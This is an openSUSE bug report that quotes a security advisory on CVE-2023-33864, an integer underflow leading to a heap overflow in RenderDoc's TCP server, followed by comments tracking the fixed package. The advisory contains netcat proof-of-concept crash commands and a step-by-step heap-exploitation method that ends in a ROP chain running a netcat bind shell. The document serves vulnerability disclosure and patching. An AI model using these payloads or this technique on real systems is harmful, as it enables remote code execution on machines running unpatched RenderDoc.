Bug 1212088 (CVE-2023-33864) - VUL-0: CVE-2023-33864: renderdoc: integer underflow to heap-based buffer overflow
Summary: VUL-0: CVE-2023-33864: renderdoc: integer underflow to heap-based buffer over...
Status: RESOLVED FIXED
Alias: CVE-2023-33864
Product: openSUSE Distribution
Classification: openSUSE
Component: Security (show other bugs)
Version: Leap 15.4
Hardware: Other Other
: P3 - Medium : Normal (vote)
Target Milestone: ---
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/368570/
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2023-06-07 07:51 UTC by Gabriele Sonnu
Modified: 2024-05-13 14:37 UTC (History)
2 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Gabriele Sonnu 2023-06-07 07:51:26 UTC
From oss-security:

- CVE-2023-33864, an integer underflow that results in a heap-based
  buffer overflow that is exploitable by any remote attacker to execute
  arbitrary code on the machine that runs RenderDoc. The unusual malloc
  exploitation technique that we used to exploit this vulnerability is
  reliable, one-shot, and works despite all the latest glibc, ASLR, PIE,
  NX, and stack-canary protections.

------------------------------------------------------------------------
Analysis
------------------------------------------------------------------------

When a client connects to librenderdoc.so's server thread on TCP port
38920, it must first send a handshake packet that contains a string, its
"client name"; to read this string, the server:

- malloc()ates an intermediary buffer of 64KB (at line 97), and reads
  the beginning of the client's handshake packet into this buffer:

------------------------------------------------------------------------
 42 static const uint64_t initialBufferSize = 64 * 1024;
 ..
 92 StreamReader::StreamReader(Network::Socket *sock, Ownership own)
 93 {
 94   m_Sock = sock;
 95 
 96   m_BufferSize = initialBufferSize;
 97   m_BufferBase = AllocAlignedBuffer(m_BufferSize);
 98   m_BufferHead = m_BufferBase;
 99 
100   // for sockets we use m_InputSize to indicate how much data has been read into the buffer.
101   m_InputSize = 0;
------------------------------------------------------------------------

- reads len, the length of the client-name string, from this
  intermediary buffer (at line 1313), and malloc()ates a string buffer
  of len bytes (at line 1314):

------------------------------------------------------------------------
1307   void SerialiseValue(SDBasic type, size_t byteSize, rdcstr &el)
1308   {
1309     uint32_t len = 0;
1310 
1311     if(IsReading())
1312     {
1313       m_Read->Read(len);
1314       el.resize((int)len);
1315       if(len > 0)
1316         m_Read->Read(&el[0], len);
------------------------------------------------------------------------

- reads the client name directly into this string buffer (at line 185)
  if it is longer than 10MB (otherwise the server first reads the client
  name into the intermediary buffer, and then memcpy()s it into the
  string buffer):

------------------------------------------------------------------------
139   bool Read(void *data, uint64_t numBytes)
140   {
...
183         if(numBytes >= 10 * 1024 * 1024 && Available() + 128 < numBytes)
184         {
185           success = ReadLargeBuffer(data, numBytes);
------------------------------------------------------------------------

More precisely, ReadLargeBuffer() reads all but the last 128 bytes of
the client name directly into the string buffer (at line 304), and reads
the last 128 bytes into the intermediary buffer (at line 354) and then
memcpy()s them into the string buffer (at line 358):

------------------------------------------------------------------------
271 bool StreamReader::ReadLargeBuffer(void *buffer, uint64_t length)
272 {
...
275   byte *dest = (byte *)buffer;
...
297     uint64_t directReadLength = length - 128;
...
304       bool ret = ReadFromExternal(dest, directReadLength);
305 
306       dest += directReadLength;
...
350   m_BufferHead = m_BufferBase + m_BufferSize;
...
354   bool ret = ReadFromExternal(m_BufferHead - 128, 128);
...
357   if(dest && ret)
358     memcpy(dest, m_BufferHead - 128, 128);
------------------------------------------------------------------------

Unfortunately, ReadFromExternal() mistakenly believes that m_InputSize
(the total number of bytes read) can never exceed m_BufferSize (the size
of the intermediary buffer), but in ReadLargeBuffer()'s case m_InputSize
becomes larger than 10MB and m_BufferSize is 64KB, so the calculation of
bufSize underflows (at line 408) and the size that is passed to recv()
is much larger than the size of the destination buffer (at line 411):

------------------------------------------------------------------------
366 bool StreamReader::ReadFromExternal(void *buffer, uint64_t length)
367 {
...
399       byte *readDest = (byte *)buffer;
400 
401       success = m_Sock->RecvDataBlocking(readDest, (uint32_t)length);
402 
403       if(success)
404       {
405         m_InputSize += length;
406         readDest += length;
407 
408         uint32_t bufSize = uint32_t(m_BufferSize - m_InputSize);
...
411         success = m_Sock->RecvDataNonBlocking(readDest, bufSize);
------------------------------------------------------------------------

Consequently, a remote attacker can overflow either the string buffer
(at line 304) or the intermediary buffer (at line 354). In the following
section, we explain how we transformed the overflow of the intermediary
buffer into a reliable, one-shot remote code execution, despite all the
latest glibc, malloc, ASLR, PIE, NX, and stack-canary protections.

Proof of concept (string-buffer overflow):

------------------------------------------------------------------------
alice$ strace -f -o strace.out -E LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
remote$ printf '\2\0\0\0\0\0\0\0\1\0\0\0\x80\x00\xa0\x00%010485760x%04096x' 1 1 | nc -nv 192.168.56.126 38920
Ncat: 10489872 bytes sent, 0 bytes received in 0.12 seconds.
------------------------------------------------------------------------
alice$ cat strace.out
...
2638  recvfrom(5, "00000000000000000000000000000000"..., 4284547056, 0, NULL, NULL) = 4096
...
2638  recvfrom(5, "", 128, 0, NULL, NULL) = 0
...
2638  writev(2, [{iov_base="Fatal glibc error: malloc assert"..., iov_len=47}, {iov_base="__libc_malloc", iov_len=13}, {iov_base=": ", iov_len=2}, {iov_base="!victim || chunk_is_mmapped (mem"..., iov_len=98}, {iov_base="\n", iov_len=1}], 5) = 161
...
2638  --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=2637, si_uid=1000} ---
2637  <... clock_nanosleep resumed> <unfinished ...>) = ?
2638  +++ killed by SIGABRT +++
2637  +++ killed by SIGABRT +++
------------------------------------------------------------------------

Proof of concept (intermediary-buffer overflow):

------------------------------------------------------------------------
alice$ strace -f -o strace.out -E LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
remote$ (printf '\2\0\0\0\0\0\0\0\1\0\0\0\x80\x00\xa0\x00%010485760x' 1; sleep 3; printf '%0128x%04096x' 1 1) | nc -nv 192.168.56.126 38920
Ncat: 10490000 bytes sent, 0 bytes received in 3.11 seconds.
------------------------------------------------------------------------
alice$ cat strace.out
...
2696  recvfrom(5, 0x7f725a9ff010, 4284547056, 0, NULL, NULL) = -1 EAGAIN (Resource temporarily unavailable)
...
2696  recvfrom(5, "00000000000000000000000000000000"..., 128, 0, NULL, NULL) = 128
...
2696  recvfrom(5, "00000000000000000000000000000000"..., 4284546928, 0, NULL, NULL) = 4096
...
2696  writev(2, [{iov_base="malloc(): corrupted top size", iov_len=28}, {iov_base="\n", iov_len=1}], 2) = 29
...
2696  --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=2695, si_uid=1000} ---
2695  <... clock_nanosleep resumed> <unfinished ...>) = ?
2696  +++ killed by SIGABRT +++
2695  +++ killed by SIGABRT +++
------------------------------------------------------------------------

------------------------------------------------------------------------
Exploitation
------------------------------------------------------------------------

1/ When librenderdoc.so's server thread is created, the glibc's malloc
allocates a new "heap" for this thread: 64MB of mmap()ed memory, whose
start address is aligned on a multiple of 64MB. Initially, this heap is
mmap()ed PROT_NONE, and is mprotect()ed read-write as needed by malloc:

    0                                       64M
----V----------------------------------------V--------------|-------------
    |          server thread's heap          |  random gap  |  libraries
----|----------------------------------------|--------------|-------------

Note: the gap of unmapped memory between the heap and the libraries is
random (and smaller than 64MB), because the heap is aligned on 64MB but
the libraries are randomly aligned on 4KB (or sometimes 2MB) by ASLR.

2/ We (remote attackers) establish 7 successive connections to the
server on TCP port 38920: for each one of these connections, the server
creates a new thread (a "client thread"), allocates a new thread stack
(8MB+4KB of mmap()ed memory, for the stack and its guard page), and then
memory-leaks this stack (because the server does not call pthread_join()
when the client thread terminates abnormally, which prevents its stack
from being freed or reused for another client thread).

The goal of this step 2/ is simply to fill the random gap between the
heap and the libraries (with the help of a memory leak), to prevent any
future thread stack from being allocated into this gap. The reason for
doing this will become clear in step 7/.

3/ We connect to the server on TCP port 38920, send a handshake packet
that contains a 16MB client-name string (it must be longer than 10MB to
trigger CVE-2023-33864), and obtain the following layout for the
server's heap:

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|               ....
--|-+-+-+-+---------------------------------------------------------------

- F are fixed chunks of memory (at the very beginning of the heap) that
  were not allocated by us but whose sizes are known to us;

- I is the 64KB intermediary buffer mentioned in the previous section;

- L is a small chunk that was memory-leaked (or free()d but stored in an
  otherwise unused tcache) and whose size is exactly controlled by us;

- C is a small chunk (a "callstack" from our handshake packet) whose
  exact size and contents do not matter much.

4/ We overflow the intermediary buffer I (thanks to CVE-2023-33864),
overwrite L's malloc_chunk header with an unchanged size field, and
overwrite C's malloc_chunk header with arbitrary prev_size and size
fields.

5/ The server free()s the intermediary buffer I. This free() succeeds
despite our buffer overflow because we overwrote the malloc_chunk header
of I's next chunk (L) with an unchanged size; without L between I and C,
free()'s security checks would detect that we overwrote C's malloc_chunk
header with arbitrary sizes and would abort().

6/ The server free()s the small chunk C. Because we overwrote C's
malloc_chunk header with a size field whose IS_MMAPPED bit is set,
free() calls its internal function munmap_chunk():

------------------------------------------------------------------------
3018 static void
3019 munmap_chunk (mchunkptr p)
3020 {
3021   size_t pagesize = GLRO (dl_pagesize);
3022   INTERNAL_SIZE_T size = chunksize (p);
....
3026   uintptr_t mem = (uintptr_t) chunk2mem (p);
3027   uintptr_t block = (uintptr_t) p - prev_size (p);
3028   size_t total_size = prev_size (p) + size;
....
3034   if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
3035       || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
3036     malloc_printerr ("munmap_chunk(): invalid pointer");
....
3044   __munmap ((char *) block, total_size);
3045 }
------------------------------------------------------------------------

- we fully control prev_size and size (because p is a pointer to C's
  malloc_chunk header, which we overwrote), so we can munmap() an
  arbitrary block of memory (at line 3044), relative to p (i.e.,
  relative to C, and without knowing the ASLR);

- we can easily satisfy the preconditions at lines 3034 and 3035,
  because we fully control prev_size and size, and because we know the
  sizes of F and I, and we precisely control the size of L.

We exploit this arbitrary munmap() to punch a hole of exactly 8MB+4KB
(the size of a thread stack and its guard page) in the middle of the
server's heap:

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|               ....               |  punched hole  |
--|-+-+-+-+----------------------------------+----------------+-----------

Note: we cannot reuse the technique that we developed to exploit
CVE-2005-1513 (in qmail) here, because of the random gap between the
server's heap and the libraries (and our exploit here must be one-shot);
for reference:

  https://www.qualys.com/2020/05/19/cve-2005-1513/remote-code-execution-qmail.txt
  https://maxwelldulin.com/BlogPost/House-of-Muney-Heap-Exploitation
  https://www.ambionics.io/blog/hacking-watchguard-firewalls

7/ We connect to the server on TCP port 38920; the server creates a new
client thread, and allocates a new stack for this thread, exactly into
the hole that we punched in the server's heap (since step 2/ such a
stack cannot be allocated anymore into the random gap between the
server's heap and the libraries):

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|               ....               |  client stack  |
--|-+-+-+-+----------------------------------+----------------+-----------

We then disconnect from the server; the client thread terminates cleanly
and the server pthread_join()s with it, thus making its stack available
for a future client thread.

8/ We establish a long-lived connection to the server, and send a 14MB
client-name string (but we do not trigger CVE-2023-33864 this time); the
server reads our client name into a malloc()ated string buffer that ends
in the middle of the unused client stack (i.e., this client name and the
client stack overlap in the server's heap):

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|        ....        |             |  client stack  |
--|-+-+-+-+--------------------+-------------+-------------+--+-----------
                               |---------------------------|
                                        client name

Note: although the client stack's guard page is initially mmap()ed
PROT_NONE, it is conveniently mprotect()ed read-write by the glibc's
malloc when extending the server's heap for our 14MB client name (in
grow_heap())!

The server then creates a new client thread for our long-lived
connection, and reuses the existing client stack for this thread, thus
overwriting the end of our client name with data from the client stack.

9/ We establish another connection to the server; however, because our
first connection is still alive, the server disconnects us, but first
gives us the name of the client that is already connected (i.e., the
server sends us back our 14MB client name, which was partly overwritten
by data from the client stack), thus information-leaking all sorts of
stack contents to us: heap addresses, library addresses, stack
addresses, the stack canary, etc.

10/ While our first connection to the server is still alive, we
establish another connection and start sending a 9MB string; the server
reads this string into a malloc()ated buffer that starts in the middle
of the client stack (immediately after the 14MB client name), thus
overwriting the client stack with data that we fully control (a ROP
chain):

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|        ....        |             |  client stack  |
--|-+-+-+-+--------------------+-------------+-------------+--+-----------
                               |---------------------------|--->
                                        client name         ROP

As soon as the client thread returns to a saved instruction pointer
(RIP) from the overwritten part of the client stack, our ROP chain is
executed: first a "ROP sled" (a series of minimal "ret" gadgets, because
we do not know the exact distance between the start of our ROP chain and
the first overwritten saved RIP in the client stack), followed by a
simple execve() of "/bin/nc -lp1337 -e/bin/bash".

Note: we build our ROP chain with gadgets from librenderdoc.so only
(whose address was information-leaked to us in step 9/), to avoid any
dependence on the application being debugged or its shared libraries.

To summarize this reliable, one-shot technique that we used to exploit
the heap-based buffer overflow in librenderdoc.so's multi-threaded TCP
server:

- we overwrite the malloc_chunk header of a heap-based buffer (which
  will be free()d) with an arbitrary size field whose IS_MMAPPED bit is
  set, and therefore transform this buffer overflow into an arbitrary
  munmap() call (thanks to free()'s munmap_chunk() function);

- with this arbitrary munmap() call, we punch a hole of exactly 8MB+4KB
  (the size of a thread stack) in the middle of the server's heap;

- we arrange for a thread stack to be mmap()ed into this hole, and for a
  string (which will later be sent to us by the server) to be
  malloc()ated over the lower part of this thread stack;

- when this string is sent to us by the server, parts of it were
  overwritten by data from the thread stack, thus information-leaking
  all sorts of stack contents to us (heap addresses, library addresses,
  stack addresses, the stack canary, etc);

- finally, we arrange for another string (which we fully control) to be
  malloc()ated over the higher part of the thread stack, and therefore
  overwrite a saved instruction pointer (in the thread stack) with a ROP
  chain of gadgets from librenderdoc.so (whose address was previously
  information-leaked to us) -- a classic "stack smashing" attack.

Note: further possibilities for munmap_chunk() exploitation are explored
in http://tukan.farm/2016/07/27/munmap-madness/.
Comment 2 Gabriele Sonnu 2023-06-07 07:57:47 UTC
Tracking as affected:

- openSUSE:Backports:SLE-15-SP5/renderdoc     1.24
- openSUSE:Factory/renderdoc                  1.26

Please update it to a non vulnerable version.
Comment 3 Patrik Jakobsson 2023-06-08 07:05:19 UTC
renderdoc v1.27 is now submitted to:
  - openSUSE:Backports:SLE-15-SP5
  - openSUSE:Factory
Comment 4 Patrik Jakobsson 2023-08-30 08:30:46 UTC
The update to v1.27 got declined due to licensing issues. Instead I've submitted an update to v1.24 which contains the required security fixes.

See: https://build.opensuse.org/request/show/1108054
Comment 5 Marcus Meissner 2023-09-25 13:06:00 UTC
openSUSE-SU-2023:0253-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1212086,1212088,1212089
CVE References: CVE-2023-33863,CVE-2023-33864,CVE-2023-33865
JIRA References: 
Sources used:
openSUSE Backports SLE-15-SP5 (src):    renderdoc-1.24-bp155.2.3.1
Comment 6 Marcus Meissner 2024-05-13 14:37:48 UTC
done